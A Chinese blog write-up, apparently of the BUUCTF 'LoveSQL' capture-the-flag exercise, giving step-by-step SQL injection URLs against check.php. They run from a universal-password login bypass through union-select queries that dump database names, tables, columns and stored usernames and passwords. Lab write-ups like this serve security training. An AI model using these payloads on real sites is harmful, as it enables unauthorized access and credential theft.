buuctf-LoveSQL 1 - 走看看

zoukankan html css js c++ java

buuctf-LoveSQL 1
最近都在做sql注入的题，感觉还不错，今天又做了一道sql题，这次可是没看大佬的wp欧

话不多说，开干，启动靶机，打开环境。

这个和上次做的没啥大的区别啊。
那我又再次查看了一下源代码。果然还是发现了check.php，看来这道题和上次的思路是一致的。

那我就再试一下，万能密码进去
/check.php?username=admin%27%20or%20%271%27=%271%20%23%20&password=123
这次的竟然没有被注释掉。em......

查了一下回显位
check.php?username=1%27%20union%20select%201,2,3%20%23%20&password=123
现在我们可以爆一下数据库
check.php?username=1%27%20union%20select%201,version(),database()%20%23%20&password=123
这就出来了，和上一个是一样的，geek嘛

下一步，爆表名
/check.php?username=1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20%23%20&password=123
有geekuser,love1ysql两个表

再试着爆一下字段名吧
/check.php?username=1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27geekuser%27%20%23%20&password=123
这就出来了。

最后爆一下数据吧
/check.php?username=1%27%20union%20select%201,2,group_concat(0x3a,username,0x3a,password)%20from%20l0ve1ysq1%20%23%20&password=123
这就出来了，思路是和我们昨天的题是一致的。
查看全文

相关阅读:
linux下配置java环境
 CentOS6 配置静态IP
数据库的事务
 MySQL总论
 JDBC面试题
 scp命令
 大数据练习题
 Linux下的Mysql安装 & 配置
 Hive的安装配置 & 基础指令
 本地存储localStorage以及它的封装接口store.js的使用

原文地址：https://www.cnblogs.com/awsole/p/13803762.html

Copyright © 2011-2022 走看看